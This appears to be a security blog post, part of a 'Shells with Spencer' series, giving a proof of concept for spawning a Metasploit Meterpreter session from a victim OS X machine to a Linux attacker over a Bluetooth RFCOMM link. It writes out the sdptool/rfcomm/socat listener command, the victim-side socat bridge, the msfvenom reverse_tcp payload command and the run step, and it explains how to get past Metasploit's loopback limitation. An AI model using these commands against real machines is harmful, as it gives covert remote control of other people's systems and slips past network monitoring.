The last post on Shells with Spencer presented code to spawn a shell with a full PTY with a Bluetooth RFCOMM socket for extended post exploitation access. This post will present an additional technique, this time for spawning a Metasploit Meterpreter session between two hosts using a Bluetooth RFCOMM socket. Specifically, in this Proof-of-Concept, a Meterpreter session will be spawned on an OS X system to a Linux attacker.
This scenario requires no custom code to be used on either side, just the socat utility on both the victim and attacking systems. At the time of this writing the latest, version of socat (2.0.0-b3) compiles without modification on the latest version of OS X. No changes need to be made to the socat source code, despite OS X not being listed as an officially supported OS.
Before the following procedure is started, the two systems must have been paired with one another following the standard process.
Linux (Metasploit) Setup
Our Meterpreter of choice in this scenario (to be run on the OS X system) will be the venerable Python Meterpreter using the reverse_tcp stager. Before execution, the Metasploit instance needs to be configured with a corresponding listener. The “exploit/multi/handler” module can be used for this purpose. This listener will accept the TCP connection that will be bridged from socat as spawned by the rfcomm utility in the next step.
Important note: Metasploit will not accept Meterpreter sessions from a loopback (127.0.0.1) address. To get around this limitation, select the IP address of any other interface (eth#, wlan# etc.).
On the Linux host, a new RFCOMM socket must be setup to listen on channel 1 with the rfcomm utility. This utility can then be used to spawn the socat command necessary to forward data to the TCP socket where Metasploit is patiently waiting for the new session. The following command will use spdtool to register channel 1 with the SP service then run the rfcomm utility to listen on that channel and spawn socat when a connection is made to it.
sdptool add --channel=1 SP; rfcomm listen /dev/rfcomm0 1 /bin/socat file:/dev/rfcomm0,echo=0,raw tcp:192.168.90.1:4444
In the example above, 192.168.90.1 is the IP address of the adapter on the Linux host where the Metasploit instance is waiting for the connection since 127.0.0.1 can not be used.
OSX (Meterpreter) Setup
When the OS X system is connected to the Linux host via Bluetooth, a file will be available called /dev/tty.localhostlocaldomain-Se-1 where localhostlocaldomain is the name the Linux host’s Bluetooth name without any periods. This file is the connection via RFCOMM through which the two socat instances will be communicating. After compiling socat on the OS X host, it can be executed to forward the TCP connection from Meterpreter over the aforementioned file with the command:
./socat tcp-l:4444,reuseaddr,fork file:/dev/tty.localhostlocaldomain-Se-1,nonblock,waitlock=./sock.lock, raw. This command will not exit and should be allowed to run in a background terminal.
The attacker must generate the shellcode ahead of time using msfvenom, making sure to set the LHOST parameter to the loopback address 127.0.0.1. The LHOST and LPORT parameters passed to msfvenom need to correspond to the parameters passed to the socat instance running on the OSX host. The LPORT setting does not necessarily need to be 4444 and also does not need to be the same as was specified on the Linux host. The command to generate this payload with msfvenom is:
./msfvenom -p python/meterpreter/reverse_tcp -f raw LHOST=127.0.0.1 LPORT=4444
Once both socat instances and Metasploit are waiting for their connections, a Bluetooth connection can be made before finally running the Python stub using
python -c "[python stub]". The result will be a fully functioning and responsive Meterpreter session over the established Bluetooth connection.
The following software versions were used in this setup:
- Linux socat 22.214.171.124
- Linux Kernel 4.1.6-200
- OS X socat 2.0.0-b3
- OS X 10.10.4 (Yosemite)